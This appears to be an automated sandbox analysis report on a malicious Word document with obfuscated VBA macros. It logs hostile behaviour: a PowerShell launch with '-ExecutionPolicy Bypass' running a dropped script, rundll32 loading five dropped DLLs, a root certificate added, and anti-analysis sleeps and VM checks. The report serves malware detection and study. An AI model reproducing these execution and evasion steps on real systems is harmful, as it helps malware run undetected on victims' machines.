Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: sample.doc.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$mple.doc.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREE34.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@25/19@5/4

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: powershell.exe, 00000003.00000002.490992699.000000001CD90000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.508165947.0000000001C00000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000002.494551301.0000000001BF0000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.487440567.0000000001BF0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: sample.doc.doc	OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DFE56B344EF3200177.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF77272A7F6F18B150.TMP.0.dr	OLE document summary: edited time not present or 0
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF26415DDA42946BBE.TMP.0.dr	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: :ystem.pdb& source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBw source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdby source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.480423902.00000000022F7000.00000004.00000040.sdmp

Source: ~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Document contains an embedded VBA with many string operations indicating source code obfuscation

Source: sample.doc.doc	Stream path 'Macros/VBA/Module1' : High number of string operations
Source: sample.doc.doc	Stream path 'Macros/VBA/Module2' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module1	Name: Module1
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module Module2	Name: Module2
Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'VBA/Module1' : High number of string operations
Source: ~DF77272A7F6F18B150.TMP.0.dr	Stream path 'VBA/Module2' : High number of string operations

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_000007FF00260F5C sldt word ptr [eax]

3_2_000007FF00260F5C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000003.00000002.480149738.00000000003F2000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Source: Yara match	File source: sample.doc.doc, type: SAMPLE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\www.ps1, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF26415DDA42946BBE.TMP, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{C9C61CB4-AA54-4D1D-A472-514E047583D2}.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\~DF77272A7F6F18B150.TMP, type: DROPPED

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www1.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www2.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www3.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www4.dll,ldr	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\ProgramData\www5.dll,ldr	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

